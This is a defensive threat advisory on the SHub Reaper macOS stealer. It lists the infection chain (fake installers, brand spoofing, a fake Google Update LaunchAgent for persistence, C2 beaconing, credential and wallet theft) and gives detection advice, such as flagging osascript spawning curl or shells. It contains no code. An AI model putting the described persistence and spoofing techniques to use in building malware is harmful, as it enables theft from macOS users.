SHub Reaper Stealer Backdoors macOS with Multi-Brand Spoofing

The SHub Reaper stealer is a macOS infostealer that blends traditional stealer functionality with persistent backdoor capabilities. It is distributed through social engineering lures such as fake WeChat and Miro installers. This malware demonstrates a shift in macOS malware behavior, moving away from ClickFix social engineering to Apple script-based execution to evade detection. SHub Reaper leverages a unique multi-brand spoofing technique, impersonating Apple, Google, and Microsoft across the infection chain. The malware installs a fake Google Update framework to maintain persistence and establishes a backdoor, allowing for arbitrary command execution and continuous compromise of the infected system. This represents an evolution in macOS infostealers, combining “smash-and-grab” data theft with long-term access and control.

Attack Chain

1. The attack starts with malicious web pages offering fake Miro and WeChat installers.
2. Victims download and execute the fake installers, initiating the infection chain.
3. The malware may be hosted on a typosquatted Microsoft domain.
4. The installer executes under the guise of a fake Apple security update.
5. SHub Reaper installs a fake Google Update framework under the user Library paths for persistence.
6. A LaunchAgent is registered using Google Keystone-style naming conventions to ensure the malware runs regularly.
7. The malware beacons to a command and control server every 60 seconds, supporting arbitrary command execution.
8. The malware steals credentials, hijacks crypto wallets, and exfiltrates documents while maintaining persistent backdoor access.

Impact

Successful SHub Reaper infections can lead to significant data loss, including sensitive credentials, cryptocurrency assets, and confidential documents. The persistent backdoor allows attackers to maintain long-term access to compromised systems, enabling further data theft, command execution, and potential lateral movement within the network. The shift from ClickFix tactics to AppleScript execution renders traditional terminal-centric detections ineffective, increasing the risk of successful compromise. This combination of stealer and backdoor capabilities makes SHub Reaper a particularly dangerous threat to macOS users.

Recommendation

• Monitor for unexpected invocations of Script Editor (Script Editor.app) to detect potential AppleScript-based execution, as outlined by SentinelOne’s report.
• Deploy the Sigma rule detecting osascript spawning curl or shell interpreters to identify malicious AppleScript activity.
• Implement the Sigma rule for detecting browser-to-AppleScript execution chains to identify potential initial access vectors.
• Educate macOS users to be wary of software installers from untrusted sources and to verify the authenticity of software updates, as this is the primary infection vector.
• Monitor user Library paths for the installation of unexpected Google Update frameworks and LaunchAgents with Google Keystone-style naming conventions, as these are indicators of persistence.